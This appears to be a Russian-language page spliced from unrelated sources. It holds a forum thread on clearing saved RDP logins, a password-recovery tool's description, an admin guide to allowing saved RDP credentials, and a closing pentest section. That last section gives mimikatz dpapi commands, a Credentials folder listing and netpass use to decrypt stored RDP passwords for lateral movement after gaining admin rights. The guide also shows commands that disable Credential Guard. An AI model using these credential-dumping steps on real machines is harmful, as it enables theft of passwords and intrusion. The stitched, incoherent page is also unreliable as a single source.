- Remove From My Forums
-
Вопрос
-
Ситуация:
имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.
Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.
Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел.P.S. Интересно именно удаленная очистка сохранение — те ветка реестра и/или файлы задействованные в сохранении rpd пароля/логина, дабы не подключаться к gui каждого.
-
Изменено
28 сентября 2009 г. 14:46
Добавлен p.s.
-
Изменено
Ответы
-
Пуск -> Настройка -> Панель управления -> Учётные записи пользователей -> Закладка «Дополнительно» -> Кнопка «Управление паролями»
MCSE, MCTS, MCITP, STS, VTSP
Добавлю свои 5 копеек: можно автоматизировать удаление сохраненных Сетевых паролей (Stored User Names andPasswords) при помощи простого логон скрипта и утилиты коммандной строки cmdkey
-
Предложено в качестве ответа
Buchenkov Andrey
29 сентября 2009 г. 5:55 -
Помечено в качестве ответа
gamumba
29 сентября 2009 г. 6:55
-
Предложено в качестве ответа
Так выглядит финальный диалог Мастера программы с найденными и расшифрованными паролями удаленного рабочего стола (в автоматическом режиме работы).
Пароли Remote Desktop Connections хранятся в *.rdp файлах и обычно находятся в папке ‘My Documents‘ текущего пользователя. При входе в ручной режим, NPRW автоматически сканирует ваш диск в поиске данных файлов.
Если *.rdp файл по какой-то причине не был найден, то можно воспользоваться поиском самостоятельно и указать путь к нему вручную.
Посмотреть список доступных конфигураций удаленного рабочего стола можно из меню Пуск -> Все программы -> Стандартные -> Связь -> Подключение к удаленному рабочему столу.
После того, как необходимая конфигурация будет выбрана, можно переходить к следующему шагу Мастера программы — указанию дополнительных параметров для расшифровки. Поскольку пароль удаленного рабочего стола шифруется с помощью системного механизма DPAPI, то нам необходимо знать три вещи:
- Логон пароль владельца информации (rdp файла в нашем случае)
- Мастер Ключ пользователя
- И его SID.
Как правило, в случае с локальной учетной записью, последние два параметра заполняются программой автоматически. Иначе, вам необходимо позаботиться об этом самостоятельно.
Встроенный RDP клиент Windows (mstsc.exe) позволяет сохранить на компьютере имя и пароль пользователя для подключения к удаленному рабочему столу. Благодаря этому пользователю не нужно каждый раз вводить пароль для подключения к удаленному RDP компьютеру/серверу. В этой статье мы рассмотрим, как разрешить сохранять учетные данные для RDP подключений в Windows, и что делать, если несмотря на все настройки, у пользователей не сохраняются пароли для RDP подключения (пароль запрашивается каждый раз)
Содержание:
- Как сохранить пароль для RDP подключения в Windows?
- Что делать, если в Windows не сохраняется пароль для RDP подключения?
- Политика проверки подлинности сервере не допускает подключение сохраненными учетными данными
- Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные
Как сохранить пароль для RDP подключения в Windows?
По умолчанию Windows разрешает пользователям сохранять пароли для RDP подключений. Для этого в окне клиента Remote Desktop Connection (mstsc.exe) пользователь должен ввести имя удаленного RDP компьютера, учетную запись и поставить галку “Разрешить мне сохранять учетные данные” (Allow me to save credential). После того, как пользователь нажимает кнопку “Подключить”, RDP сервер запрашивает пароль и компьютер сохраняет его в Windows Credential Manager (не в .RDP файл).
При следующем подключении к удаленному RDP серверу под этим же пользователем, клиент автоматически получит сохраненный пароль из менеджера паролей Windows и использует его для RDP-аутентификации.
Если для данного компьютера имеется сохраненный пароль, в окне RDP клиента будет указано:
При подключении к данному компьютеру будут использоваться сохранённые учетные данные. Эти учетные данные можно изменить или удалить.
Saved credentials will be used to connect to this computer. You can edit or delete these credentials.
В большинстве случаев администраторы не рекомендуют пользователям сохранять пароли подключений в Windows. Например, в домене Active Directory лучше настроить SSO (Single Sign-On) для прозрачной RDP аутентификации.
По умолчанию Windows не разрешает пользователю использовать сохраненный пароль RDP подключения с компьютера, добавленного в домен Active Directory, к компьютеру/серверу, который находится в другом домене или рабочей группе. Несмотря на то, что пароль для подключения сохранен в Credentials Manager, Windows не позволяет его использовать, и требует от пользователя каждый раз вводить пароль. Также Windows не разрешает использовать сохраненный пароль для RDP, если вы подключаетесь не под доменной, а под локальной учетной записью.
При попытке RDP подключения с сохраненным паролем в этой ситуации появляется окно с ошибкой:
Your Credentials did not work
Your system administrator does not allow the use of saved credentials to log on to the remote computer CompName because its identity is not fully verified. Please enter new credentials.
Или (в русской редакции Windows 10):
Недопустимые учетные данные
Системный администратор запретил использовать сохраненные учетные данные для входа в систему удаленного компьютера CompName, так как его подлинность проверена не полностью. Введите новые учетные данные.
Windows считает такое подключение небезопасным, т.к. отсутствуют доверительные отношения между этим компьютером и удаленным компьютером/сервером в другом домене (или рабочей группе).
Вы можете изменить эти настройки на компьютере, с которого выполняется RDP подключение:
- Откройте редактор локальной GPO, нажав Win + R -> gpedit.msc ;
- В редакторе GPO перейдите в раздел Computer Configuration –> Administrative Templates –> System –> Credentials Delegation (Конфигурация компьютера -> Административные шаблоны -> Система -> Передача учетных данных). Найдите политику с именем Allow delegating saved credentials with NTLM-only server authentication (Разрешить передачу сохраненных учетных данных с проверкой подлинности сервера только NTLM);
- Дважды щелкните по политике. Включите политику (Enable) и нажмите на кнопку Показать (Show);
- В открывшемся окне нужно будет указать список удаленных компьютеров (серверов), для которых будет разрешено использовать сохранные пароли для RDP подключения. Список удаленных компьютеров нужно указать в следующих форматах:
-
TERMSRV/server1
— разрешить использование сохранённых паролей для RDP подключения к одному конкретному компьютеру/серверу; -
TERMSRV/*.winitpro.ru
— разрешить RDP подключение ко всем компьютерам в домене winitpro.ru; -
TERMSRV/*
— разрешить использование сохранённого пароля для подключения к любым компьютерам.
Примечание. TERMSRV нужно обязательно писать в верхнем регистре, а имя компьютера должно полностью соответствовать тому, которое вы указываете в поле подключения RDP клиента.
-
- Аналогичным образом включите и добавьте ваши значения TERMSRV/ в параметр Allow Delegating Saved Credentials (“Разрешить передачу сохранённых учетных данных”);
Этим настройкам GPO соответствуют следующие параметры реестра:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegation] "AllowSavedCredentialsWhenNTLMOnly"=dword:00000001 “AllowSavedCredentials”=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentialsWhenNTLMOnly] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentials] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegation] “AllowSavedCredentialsWhenNTLMOnly”=dword:00000001 “AllowSavedCredentials”=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentialsWhenNTLMOnly] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentials] "1"="TERMSRV/*"
- Проверьте, что политика Deny delegating saved credentials / Запретить передачу сохраненных учетных данных отключена (или не настроена). Запретительные политики GPO имеют более высокий приоритет, чем разрешающие;
- Также должен быть отключен параметр Network access: Do not allow storage of passwords and credentials for network authentication (Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options); Если этот параметр включен, то при попытке сохранить пароль в хранилище пользователь получит ошибку:
Credential Manager ErrorUnable to save credentials. To save credentials in this vault, check your computer configuration.Error code: 0x80070520 Error Message: A specified logon session does not exist. It may already have been terminated.
- Сохраните изменения и обновите групповые политики командой
gpupdate /force
Теперь при выполнении RDP подключения клиент mstsc сможет использовать сохранённый пароль.
Вы можете вывести список сохранённых паролей для RDP подключений с помощью команды:
cmdkey /list ^| findstr "target=TERMSRV"
Чтобы очистить сохраненные пароли подключений, выполните команду:
For /F "tokens=1,2 delims= " %G in ('cmdkey /list ^| findstr "target=TERMSRV"') do cmdkey /delete %H
С помощью локального редактора групповых политик вы сможете переопределить политику только на локальном компьютере. Если вы хотите чтобы политика разрешения использования сохранённых паролей для RDP подключения действовала на множество компьютеров домена, используете доменные политики, которые настраиваются с помощью консоли gpmc.msc.
Что делать, если в Windows не сохраняется пароль для RDP подключения?
Если вы настроили Windows по инструкции выше, но клиент все равно при каждом повторном RDP подключении требует ввести пароль следует проверить следующее:
- В окне RDP подключения нажмите на кнопку “Показать параметры” и убедитесь, что опция “Всегда запрашивать учетные данные” (Always ask for credentials) не выбрана;
- Если вы используете для подключения сохранённый RDP файл, проверьте, что параметр “prompt for credentials” равен 0 (
prompt for credentials:i:0
); - Запустите редактор локальной групповой политики
gpedit.msc
, перейдите в раздел Конфигурация компьютера -> Компоненты Windows -> Службы удаленных рабочих столов -> Клиент подключения к удаленному рабочему столу (Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client). Параметры “Запретить сохранение паролей” (Do not allow passwords to be saved) и Prompt for credentials on the client computer должны быть не заданы или отключены. Также убедитесь, что он отключен в результирующей политике на вашем компьютере (html отчет с применёнными настройками доменных политик можно сформировать с помощью gpresult); - Удалите все сохраненные пароли в менеджере паролей Windows (Credential Manager). Наберите
control userpasswords2
и в окне “Учетные записи пользователей” перейдите на вкладку “Дополнительно” и нажмите на кнопку “Управление паролями”; В открывшемся окне выберите “Учетные данные Windows”. Найдите и удалите все сохраненные RDP пароли (начинаются с TERMSRV/…).Из этого окна вы можете самостоятельно добавить учетных данные для RDP подключений. Обратите внимание, что имя удаленного RDP сервера (компьютера) нужно указывать в формате TERMSRVserver_name1. При очистке истории RDP подключений на компьютере, не забывайте удалять сохраненные пароли.
- Вход с сохраненным паролем также не будет работать, если удаленный RDP сервер давно не обновлялся и при подключении к нему появляется ошибка CredSSP encryption oracle remediation.
После этого, пользователи смогут использовать свои сохраненные пароли для rdp подключений.
Политика проверки подлинности сервере не допускает подключение сохраненными учетными данными
При подключении к RDP хосту или ферме RDS с помощью сохраненного пароля может появится ошибка:
Windows Security Your credentials did not work The server’s authentication policy does not allow connection requests using saved credentials. Please enter new credentials.
Политика проверки подлинности на сервере не допускает запросы на подключение с использованием сохраненных учетных данных.
В этом случае на удаленном сервере нужно отключить параметр “Always prompt for password upon connection” в разделе Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host -> Security.
Если эта политика включена, RDP хост всегда запрашивает у клиента пароль для подключения.
Можно включить этот параметр через реестр:
REG add "HKLMSOFTWAREPoliciesMicrosoftWindows NTTerminal Services" /v fPromptForPassword /t REG_DWORD /d 0 /f
Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные
После обновления до Windows 11 22H2 пользователи стали жаловаться, что теперь они не могут использовать сохраненные пароли для RDP подключений:
Windows Security: Your credentials did not work Windows Defender Credential Guard does not allow using saved credentials. Please enter your credentials.
Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные.
Представленные еще в Windows 10 1607 компонент Windows Defender Remote Credential Guard должен защищать ваши учетные данные для RDP подключений. В обновлении 22H2 по умолчанию он разрешает использовать сохраненные учетные данные только при использовании Kerberos аутентификации на RDP хосте. Если нельзя использовать Kerberos (контроллер домена не доступен, или вы подключаетесь к хосту в рабочей группе), Remote Credential Guard блокирует аутентификацию с помощью NTLM.
Для решения этой проблемы придется отключить Credential Guard через реестр:
New-ItemProperty -Path "HKLM:SystemCurrentControlSetControlLSA" -Name "LsaCfgFlags" -PropertyType "DWORD" -Value 0 -Force
0x01 введение
После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.
0x02 Получить пароль RDP, сохраненный локально на управляемой машине
Один, мимикатц
1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
Просмотр информации об удаленном хосте, сохраненной локально
cmdkey /list
3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.
mimikatz # privilege::debug
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58
4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.
mimikatz # sekurlsa::dpapi
5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d
Два, netpass
скачать:
netpass
использовать:
Дважды щелкните netpass.exe.
:
Три, другие
Скрипт Powershell для автоматизации дешифрования …